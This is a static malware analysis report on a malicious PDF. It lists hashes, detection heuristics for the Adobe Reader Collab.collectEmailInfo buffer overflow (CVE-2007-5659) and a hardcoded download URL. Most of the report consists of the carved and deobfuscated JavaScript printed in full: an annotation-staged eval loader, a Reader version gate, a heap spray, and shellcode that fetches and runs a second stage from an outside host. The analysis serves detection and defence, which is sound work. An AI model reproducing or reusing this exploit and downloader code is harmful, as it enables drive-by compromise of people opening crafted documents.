Malicious PDF — malware analysis report

Static analysis result for SHA-256 215b60765536064c…

Verdict: MALICIOUS
File type: PDF
Size: 8.2 KB
First seen: 2026-05-08
MD5: 498941469d1e02c85603d9eade1c7845
SHA-1: ad03441e8e1605dfa9c22efe813edd5a21c27963
SHA-256: 215b60765536064c4795e23784915cf0565f3519c378ea0aab989b5a66728bfe
Risk Score: 266

Malware Insights

MITRE ATT&CK: T1059.001 (PowerShell)

The PDF file contains multiple embedded JavaScript streams, some of which are obfuscated using String.fromCharCode and other techniques. The heuristics indicate that the PDF launcher concatenates information fields, extracts characters at a fixed stride, and evaluates the result. This suggests the script's primary purpose is to download and execute a second-stage payload from a remote source, a common technique for initial access.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (9)

  • Collab.collectEmailInfo — CVE-2007-5659 [severity: critical; CVE match: exact; rule: CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action [severity: low; 4 related findings; rule: PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [severity: high; CVE match: likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE]
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var L6je5pyH = new Array();var WY__gFK8t006__w = 0;var P_00Hh_r = "";function e78__rQa2_FB__v(AU8O5qP34j, MY__To___ubf_X){var VLk04Ilw234V6p = MY__To___ubf_X.toString();var H4l7_6cn = "";for(var bp330arwN3uG = 0; bp330arwN3uG < VLk04Ilw234V6p.length; bp330arwN3uG++) {var i3W_TgR5kUk = parseInt(VLk04Ilw234V6p.substr(bp330arwN3uG, 1));if (!isNaN(i3W_TgR5kUk)) {i3W_TgR5kUk = i3W_TgR5kUk.toString(16);if (i3W_TgR5kUk.length == 1) { i3W_TgR5kUk = "0" + i3W_TgR5kUk; }else if (i3W_TgR5kUk.length != 2) { …
  • PDF JavaScript exploit cluster [severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL [severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL]
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [severity: low; rule: PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive [severity: low; rule: PDF_FOXIT_SYNCANNOTSCAN]
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact [severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [severity: info; rule: EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://googleinru.in/cgi-bin/etn/z006106201r0019Reebe2cb9Xc1067111Y2c3cc32cZ0100f060 (referenced by PDF JavaScript)

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Per-file fields: Filename, Kind, Source, Size.

Filename: javascript_obj0004_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 4 at offset 0xE1
Size: 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
Filename: numeric_charcode_stage_000.js
Kind: deobfuscated-js
Source: numeric char-code string decoded JavaScript at offset 0xEF
Size: 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
Filename: legacy_pdfkit_stage_000.js
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x1B90
Size: 1839 bytes
SHA-256: 5e8883b77cb9423a668d5630a09301e84fb8854fc1de2b2def92920811bc1f58
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function eI6_6o_676hb(F_0___MyX, rL_6w30P_P6_pFO){var CEm8k64__H = 4;var kE_p7FH__853tpi = new Array();var Nv8sk_63 = new Array(107,256,11,  512, 106, 11,  44,40, 33);Nv8sk_63[5] += 12;var le8MEk0us = "";try {var jj__xd_T6TO = 0;if (app) {rL_6w30P_P6_pFO = pr[jj__xd_T6TO].subject;}} catch(e) {}if (!F_0___MyX) { kE_p7FH__853tpi[0] = 0;kE_p7FH__853tpi[1] = kE_p7FH__853tpi[0];kE_p7FH__853tpi[2] = kE_p7FH__853tpi[1];kE_p7FH__853tpi[3] = kE_p7FH__853tpi[2];var B__574Cbc = Nv8sk_63[6] + 3;var m_5a__l = B__574Cbc + 11;var H__D8N_3d__8j7c = eI6_6o_676hb;var fPsAJ_w8fw8h = 0;H__D8N_3d__8j7c = H__D8N_3d__8j7c.toString();for(var t1__1HA__Y1_1_K = 0; t1__1HA__Y1_1_K < H__D8N_3d__8j7c.length; t1__1HA__Y1_1_K++) {var E1_o3ak6__gS_k = H__D8N_3d__8j7c.charCodeAt(t1__1HA__Y1_1_K);if (E1_o3ak6__gS_k > B__574Cbc && E1_o3ak6__gS_k < m_5a__l) {if (fPsAJ_w8fw8h == 4) {fPsAJ_w8fw8h = 0;}kE_p7FH__853tpi[fPsAJ_w8fw8h] += E1_o3ak6__gS_k;if (kE_p7FH__853tpi[fPsAJ_w8fw8h] > Nv8sk_63[3]) {kE_p7FH__853tpi[fPsAJ_w8fw8h] -= 512;}fPsAJ_w8fw8h++;}}}else  { kE_p7FH__853tpi = F_0___MyX;}for (var j2M016 = 0; j2M016 < 4; j2M016++) {if (kE_p7FH__853tpi[j2M016] > Nv8sk_63[1]) {kE_p7FH__853tpi[j2M016] -= Nv8sk_63[1];}}var y1f1_C_q__1g = 0;var Y_Bbtf_R8O4 = 0;var Xi_0_l_I7c;var e5uU_5m48__t = 0;while ( y1f1_C_q__1g < rL_6w30P_P6_pFO.length ) {var R6w_K2__e = "";R6w_K2__e = rL_6w30P_P6_pFO.substr(y1f1_C_q__1g, 2);var AsdE_n_0x13et = parseInt(R6w_K2__e, Nv8sk_63[5]); if (Y_Bbtf_R8O4 == 4) {Y_Bbtf_R8O4 = 0;}AsdE_n_0x13et -= (e5uU_5m48__t + 2) * kE_p7FH__853tpi[Y_Bbtf_R8O4];if (AsdE_n_0x13et < 0) {AsdE_n_0x13et -= Math.floor(AsdE_n_0x13et / Nv8sk_63[1]) * Nv8sk_63[1];}le8MEk0us += String.fromCharCode(AsdE_n_0x13et);{y1f1_C_q__1g += 2;e5uU_5m48__t++;Y_Bbtf_R8O4++;}}var VWJM_3I5 = this;VWJM_3I5["eval"](le8MEk0us);return 0;}

	eI6_6o_676hb(0);
Filename: legacy_pdfkit_stage_001.js
Kind: deobfuscated-js
Source: annotation-subject callee-key decoded JavaScript at offset 0x4C3
Size: 4979 bytes
SHA-256: 08f5dd48c8a7c653d1ec0a6ef8f069f76914376162b6701766260fc8638f5cb3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var L6je5pyH = new Array();var WY__gFK8t006__w = 0;var P_00Hh_r = "";function e78__rQa2_FB__v(AU8O5qP34j, MY__To___ubf_X){var VLk04Ilw234V6p = MY__To___ubf_X.toString();var H4l7_6cn = "";for(var bp330arwN3uG = 0; bp330arwN3uG < VLk04Ilw234V6p.length; bp330arwN3uG++) {var i3W_TgR5kUk = parseInt(VLk04Ilw234V6p.substr(bp330arwN3uG, 1));if (!isNaN(i3W_TgR5kUk)) {i3W_TgR5kUk = i3W_TgR5kUk.toString(16);if (i3W_TgR5kUk.length == 1) { i3W_TgR5kUk = "0" + i3W_TgR5kUk; }else if (i3W_TgR5kUk.length != 2) { i3W_TgR5kUk = "00"; }H4l7_6cn = i3W_TgR5kUk + H4l7_6cn;}}while(H4l7_6cn.length < 8) { H4l7_6cn = "0" + H4l7_6cn; }var c0cM_j = AU8O5qP34j.toString(16);if (c0cM_j.length == 1) { c0cM_j = "0" + c0cM_j; }else if (c0cM_j.length != 2) { c0cM_j = "00"; }H4l7_6cn = "3" + c0cM_j + "P" + H4l7_6cn;return H4l7_6cn;}function nk2C_K51_hc8mt(TP0gb520hu, B_88_yNj_dHU_2){var Bd_5ALq = new Array("");var B7_I_4PC1vt = TP0gb520hu;var mk3_x71_i;if ((mk3_x71_i = TP0gb520hu.lastIndexOf("%u00")) != -1) {if (mk3_x71_i + 6 == TP0gb520hu.length) {Bd_5ALq[0] = TP0gb520hu.substr(mk3_x71_i + 4, 2);B7_I_4PC1vt = TP0gb520hu.substring(0, mk3_x71_i);}}mk3_x71_i = 1;for (bp330arwN3uG = 0; bp330arwN3uG < B_88_yNj_dHU_2.length; bp330arwN3uG++) {var F2rh7___0_joQF = B_88_yNj_dHU_2.charCodeAt(bp330arwN3uG).toString(16);if (F2rh7___0_joQF.length == 1) { F2rh7___0_joQF = "0" + F2rh7___0_joQF; }Bd_5ALq[mk3_x71_i] = F2rh7___0_joQF;mk3_x71_i++;}bp330arwN3uG = Bd_5ALq[0].length ? 
0 : 1;Bd_5ALq[mk3_x71_i] = "00";Bd_5ALq[mk3_x71_i + 1] = "00";mk3_x71_i += 2;if ((Bd_5ALq.length - bp330arwN3uG) % 2) {Bd_5ALq[mk3_x71_i] = "00";}while(bp330arwN3uG < Bd_5ALq.length) {B7_I_4PC1vt += "%u" + Bd_5ALq[bp330arwN3uG + 1] + Bd_5ALq[bp330arwN3uG];bp330arwN3uG += 2;}B7_I_4PC1vt += "%u0000";return B7_I_4PC1vt;}function o54hFj_43(aG_v1_LX6, JN1wHD){while (aG_v1_LX6.length*2<JN1wHD) {aG_v1_LX6 += aG_v1_LX6;}aG_v1_LX6 = aG_v1_LX6.substring(0,JN1wHD/2);return aG_v1_LX6;}function x73Cj_h_6d4r5eA(S_2K833, R___g_O_w2, xfcHns_qme2p){var M___nJ__d5W23_2 = 0x0c0c0c0c;var aG_v1_LX6 = unescape(R___g_O_w2);var B_88_yNj_dHU_2 = e78__rQa2_FB__v(S_2K833, xfcHns_qme2p);var sih_E____l = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var TP0gb520hu = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4270%u4e6b%u0078%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3136%u3630%u3032%u7231%u3030%u3931%
u6552%u6265%u3265%u6263%u5839%u3163%u3630%u3137%u3131%u3259%u3363%u6363%u3233%u5a63%u3130%u3030%u3066%u3036";app.nK484Pj = unescape(nk2C_K51_hc8mt(TP0gb520hu, B_88_yNj_dHU_2));var AEn_d6DN = 0x400000;var tQ__ps = sih_E____l.length * 2;var JN1wHD = AEn_d6DN - (tQ__ps+0x38);aG_v1_LX6 = o54hFj_43(aG_v1_LX6, JN1wHD);var NwP2l15mEo = (M___nJ__d5W23_2 - 0x400000)/AEn_d6DN;for (var a_r0_t_8 = 0; a_r0_t_8 < NwP2l15mEo; a_r0_t_8++) {L6je5pyH[a_r0_t_8] = aG_v1_LX6 + sih_E____l;}}function lV2v_x6Q(){var uA6_0___yW____d = "";for (bp330arwN3uG = 0; bp330arwN3uG < 12; bp330arwN3uG++) {uA6_0___yW____d += unescape("%u0c0c%u0c0c");}var sIM2e_b_Ii = "";for (bp330arwN3uG = 0; bp330arwN3uG < 750; bp330arwN3uG++) {sIM2e_b_Ii += uA6_0___yW____d;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: sIM2e_b_Ii});app.clearTimeOut(WY__gFK8t006__w);}function T__S_S_3B(h28UgPY63Hl7){var Re6BeKV8b = WY__gFK8t006__w;if ((h28UgPY63Hl7 >= 8 && h28UgPY63Hl7 < 8.11) || h28UgPY63Hl7 < 7.1) {x73Cj_h_6d4r5eA(23, "%u0c0c%u0c0c", h28UgPY63Hl7);lV2v_x6Q();}if (Re6BeKV8b) {app.clearTimeOut(Re6BeKV8b);}}var xfcHns_qme2p = 0;var m_2_n_62bh6t = app.plugIns;for (var wP__q52cmu0g_O = 0; wP__q52cmu0g_O < m_2_n_62bh6t.length; wP__q52cmu0g_O++) {var C_qtHO = m_2_n_62bh6t[wP__q52cmu0g_O].version;if (C_qtHO > xfcHns_qme2p) { xfcHns_qme2p = C_qtHO; }}if (app.viewerVersion == 9.103 && xfcHns_qme2p < 9.13) {xfcHns_qme2p = 9.13;}app.d_a2___5yPTw_l = T__S_S_3B;WY__gFK8t006__w = app.setTimeOut("app.d_a2___5yPTw_l(" + xfcHns_qme2p.toString() + ")", 50);